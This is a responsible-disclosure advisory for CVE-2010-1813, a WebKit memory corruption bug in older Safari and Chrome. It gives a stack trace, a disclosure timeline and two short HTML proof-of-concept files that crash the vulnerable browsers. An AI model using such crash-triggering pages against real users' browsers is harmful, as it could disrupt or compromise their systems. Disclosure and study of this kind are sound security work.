Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption

                                                TITLE: WEBKIT (APPLE SAFARI < 4.1.2/5.0.2 & GOOGLE CHROME < 5.0.375.125) MEMORY CORRUPTION VULNERABILITY
TESTED OS: WINDOWS XP SP3
SEVERITY: HIGH
CVE-NUMBER: CVE-2010-1813
DISCOVERED DATE: 2010-06-29
FIXED DATE: GOOGLE CHROME (2010-07-26) & APPLE SAFARI (2010-09-08)
FIXED VERSIONS: GOOGLE CHROME 5.0.375.125 & APPLE SAFARI 4.1.2/5.0.2
DISCOVERED BY: JOSE A. VAZQUEZ

======ABOUT APPLICATION======

"WebKit is an open source web browser engine. WebKit is also the name of the Mac OS X system framework version 
of the engine that's used by Safari, Dashboard, Mail, and many other OS X applications. WebKit's HTML and 
JavaScript code began as a branch of the KHTML and KJS libraries from KDE..." copied from http://webkit.org/

======DESCRIPTION======

A memory corruption vulnerability was confirmed by Chromium Security Team. Original stacktrace showed a null ptr 
dereference, but some pointers were also corrupted. 

Stacktrace (using Chrome symbols):

WebCore::RenderObject::containingBlock()  Line 597
WebCore::RenderBlock::paintContinuationOutlines()  Line 2344
WebCore::RenderBlock::paintObject()  Line 2232
WebCore::RenderBlock::paint()  Line 1980
WebCore::RenderLayer::paintLayer()  Line 2447
WebCore::RenderLayer::paintList()  Line 2499
WebCore::RenderLayer::paintLayer()  Line 2468
WebCore::RenderLayer::paint()  Line 2252
WebCore::FrameView::paintContents()  Line 1943
WebCore::ScrollView::paint()  Line 797
WebCore::RenderWidget::paint()  Line 281
WebCore::InlineBox::paint()  Line 180
WebCore::InlineFlowBox::paint()  Line 682
WebCore::RootInlineBox::paint()  Line 167
WebCore::RenderLineBoxList::paint()  Line 219
WebCore::RenderBlock::paintContents()  Line 2090
WebCore::RenderBlock::paintObject()  Line 2199
WebCore::RenderBlock::paint()  Line 1980
WebCore::RenderBlock::paintChildren()  Line 2127
WebCore::RenderBlock::paintContents()  Line 2092
WebCore::RenderBlock::paintObject()  Line 2199
WebCore::RenderBlock::paint()  Line 1980
WebCore::RenderLayer::paintLayer()  Line 2445
WebCore::RenderLayer::paintList()  Line 2499
WebCore::RenderLayer::paintLayer()  Line 2468
WebCore::RenderLayer::paint()  Line 2252
WebCore::FrameView::paintContents()  Line 1943
WebCore::ScrollView::paint()  Line 797
WebKit::WebFrameImpl::paintWithContext()  Line 1795
WebKit::WebFrameImpl::paint()  Line 1818
WebKit::WebViewImpl::paint()  Line 979
RenderWidget::PaintRect()  Line 390
RenderWidget::DoDeferredUpdate()  Line 501
RenderWidget::CallDoDeferredUpdate()  Line 428


======PROOF OF CONCEPT======

File 1.html:

<meta http-equiv="refresh" content="1;URL=1.html" >
<iframe src="2.html"></iframe>

File 2.html:

<dialog style='position:relative'>
 <h style='outline-style:auto'>X<div></div></h>
</dialog>


======STEPS TO REPRODUCE======

1.- Upload 1.html and 2.html to your server.
2.- Open file 1.html with vulnerable app.

-Google Chrome:

3.- Wait for a while, then, crash is got (sad-tab).

-Apple Safari:

3.- Wait for a while, if crash is not got, use Ctrl+T to trigger it.
 


======REFERENCES======

[ref-1] -> https://bugs.webkit.org/show_bug.cgi?id=41373
[ref-2] -> http://googlechromereleases.blogspot.com/2010/07/stable-channel-update_26.html
[ref-3] -> http://support.apple.com/kb/HT4334
[ref-4] -> http://spa-s3c.blogspot.com/2010/09/full-responsible-disclosurewebkit-apple.html


======DISCLOSURE TIMELINE======

Standard Time Zone: GMT/UTC + 01:00 hour (Spain/Madrid)

[2010-06-29] => Posted new issue in Chromium Project (with pocs).
[2010-06-29] => Chromium confirmed memory corruption and opened new webkit bug.
[2010-07-26] => Chromium released new fix (Google Chrome 5.0.375.125).
[2010-09-08] => Apple released new fix (Apple Safari 4.1.2/5.0.2).
[2010-09-10] => Public disclosure.


======CREDITS=======

Jose Antonio Vazquez Gonzalez,
Telecom. Engineer & Sec. Researcher.
http://spa-s3c.blogspot.com/